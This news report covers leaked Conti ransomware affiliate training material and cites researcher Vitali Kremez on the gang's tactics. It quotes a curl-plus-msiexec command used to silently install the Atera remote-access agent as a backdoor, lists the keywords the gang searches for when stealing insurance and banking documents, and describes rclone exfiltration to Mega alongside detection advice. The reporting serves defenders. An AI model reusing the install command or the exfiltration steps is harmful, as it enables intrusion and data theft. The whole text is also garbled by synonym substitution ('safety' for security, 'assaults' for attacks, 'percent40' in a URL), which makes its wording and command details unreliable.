Coaching materials utilized by Conti ransomware associates was leaked on-line this month, permitting an inside have a look at how attackers abuse legit software program and hunt down cyber insurance coverage insurance policies.
Earlier this month, a disgruntled affiliate posted to a hacking discussion board the IP addresses for Cobalt Strike C2 servers utilized by the gang and a 113 MB archive containing coaching materials for conducting ransomware assaults.
Utilizing this leaked coaching materials, safety researchers, community admins, and incident responders can higher reply to assaults and shortly discover frequent indicators of compromise (IOCs) utilized by the ransomware gang.
That is precisely the case with new analysis launched by Superior Intel’s CEO Vitali Kremez that illustrates how precise Conti assaults utilized the leaked info.
Authentic distant entry software program used as backdoors
An fascinating tactic utilized by the ransomware gang is utilizing the legit Atera distant entry software program as a backdoor for continued persistence.
When conducting an assault, ransomware operations generally deploy Cobalt Strike beacons that the attackers can use to execute instructions remotely and achieve continued entry to a community.
Nonetheless, safety software program merchandise have develop into more proficient at detecting Cobalt strike beacons, resulting in a lack of entry for the risk actors.
To forestall this, Kremez states that the Conti gang is putting in the legit Atera distant entry software program on compromised techniques, which the safety software program will not detect.
Atera is a distant administration service the place you deploy brokers to your endpoints so as to handle all of them from a single console. By deploying brokers to all compromised units on a community, the Conti risk actors will achieve distant entry to any system from a single platform.
Kremez states that they’ve seen the next command utilized by Conti associates to put in Atera on a compromised system:
shell curl -o setup.msi "http://REDACTED.servicedesk.atera.com/GetAgent/Msi/?customerId=1&integratorLogin=REDACTEDpercent40protonmail.com" && msiexec /i setup.msi /qn IntegratorLogin=REDACTED@protonmail.com CompanyId=1
“In many of the instances, the adversaries leveraged protonmail[.]com and outlook[.]com electronic mail accounts to register with Atera to obtain an agent set up script and console entry,” defined Kremez in a blog post about Conti utilizing Atera.
Kremez advises admins to make use of whitelisting instruments to dam or audit command-line instruments comparable to ‘curl’ to detect malicious exercise.
“Audit and/or block command-line interpreters by utilizing whitelisting instruments, like AppLocker or Software program Restriction Insurance policies with the give attention to any suspicious “curl” command and unauthorized “.msi” installer scripts notably these from C:ProgramData and C:Temp listing,” advises Kremez.
Conti targets insurance coverage, banking information
One of many leaked paperwork titled ‘CobaltStrike MANUAL_V2 .docx’ particulars the particular steps that an affiliate ought to use when conducting a Conti ransomware assault.
After the primary stage of the assault, which is to breach the community, collect credentials, and achieve management of the Home windows area, the risk actors inform their associates to begin exfiltrating knowledge from the compromised community.
This stage is crucial for the attackers, as information aren’t solely used to scare victims into paying a ransom, however stolen accounting and insurance coverage coverage paperwork are additionally used to generate the preliminary ransom quantity and carry out negotiations.
When first exfiltrating knowledge from the sufferer’s servers, the Conti ransomware gang will particularly search for paperwork associated to the corporate’s financials and whether or not they have a cybersecurity coverage.
“search by key phrases. want accounting reviews. financial institution statements. for 20-21 years. all contemporary. particularly essential, cyber insurance coverage, safety coverage paperwork,” reads the translated Conti coaching doc.
Specifically, the risk actors search for the next key phrases as a part of their first knowledge exfiltration steps:
cyber coverage insurance coverage endorsement supplementary underwriting phrases financial institution 2020 2021 Assertion
The ransomware gang tells the associates to “prepares datapack straight away” and instantly add the info to Mega, which they used as a internet hosting platform for the exfiltrated knowledge.
Kremez mentioned that the attackers use the legit ‘rclone‘ program to add the info on to the Mega cloud storage service.
“Rclone config is created and an exterior location (MEGA on this case) for knowledge synchronization (knowledge cloning) is established. The wanted community shares are assigned inside the rclone.conf on the sufferer’s community and a command is executed,” explains Kremez in a blog post.
Kremez states that it’s best to give attention to any rclone.exe command run from the C:ProgramData and C:Temp directories to detect knowledge exfiltration makes an attempt.